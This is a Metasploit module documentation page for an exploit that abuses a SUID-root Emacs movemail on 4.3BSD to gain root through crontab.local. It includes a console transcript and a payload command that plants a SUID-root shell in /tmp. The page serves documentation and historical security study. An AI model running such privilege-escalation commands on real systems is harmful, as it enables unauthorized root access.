adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/exploit/unix/local/emacs_movemail.md
T
William Vu c5df5355ac Update my module documentation to the new standard 
Also update CheckModule to match current style and best practices.
2020-04-20 20:06:52 -05:00

89 lines
2.4 KiB
Markdown
Raw Blame History

## Vulnerable Application
### Description
This module exploits a SUID installation of the Emacs `movemail` utility
to run a command as root by writing to 4.3BSD's `/usr/lib/crontab.local`.
The vulnerability is documented in Cliff Stoll's book *The Cuckoo's Egg*.
### Setup
A Docker environment for 4.3BSD on VAX is available at
<https://github.com/wvu/ye-olde-bsd>.
For manual setup, please follow the Computer History Wiki's
[guide](http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH) or Allen
Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).
## Verification Steps
Follow [Setup](#setup) and [Scenarios](#scenarios).
## Targets
### 0
This uses `/usr/lib/crontab.local` to execute code.
## Options
### MOVEMAIL
Set this to the absolute path to the SUID-root `movemail` executable.
### CMD
If your payload is `cmd/unix/generic` (suggested default), set this to
the command you want to run as root. The provided default will create a
SUID-root shell at `/tmp/sh`.
## Scenarios
### 4.3BSD
```
msf5 > use exploit/unix/local/emacs_movemail
msf5 exploit(unix/local/emacs_movemail) > options
Module options (exploit/unix/local/emacs_movemail):
Name Current Setting Required Description
---- --------------- -------- -----------
MOVEMAIL /etc/movemail yes Path to movemail
SESSION yes The session to run this module on.
Payload options (cmd/unix/generic):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD cp /bin/sh /tmp && chmod u+s /tmp/sh yes The command string to execute
Exploit target:
Id Name
-- ----
0 /usr/lib/crontab.local
msf5 exploit(unix/local/emacs_movemail) > set session -1
session => -1
msf5 exploit(unix/local/emacs_movemail) > run
[*] Setting a sane $PATH: /bin:/usr/bin:/usr/ucb:/etc
[-] Current shell is unknown
[*] $PATH is /bin:/usr/bin:/usr/ucb:/etc
[+] SUID-root /etc/movemail found
[*] Preparing crontab with payload
* * * * * root cp /bin/sh /tmp && chmod u+s /tmp/sh
* * * * * root rm -f /usr/lib/crontab.local
[*] Creating writable /usr/lib/crontab.local
[+] Writing crontab to /usr/lib/crontab.local
[!] Please wait at least one minute for effect
[*] Exploit completed, but no session was created.
msf5 exploit(unix/local/emacs_movemail) >
```
Reference in New Issue View Git Blame Copy Permalink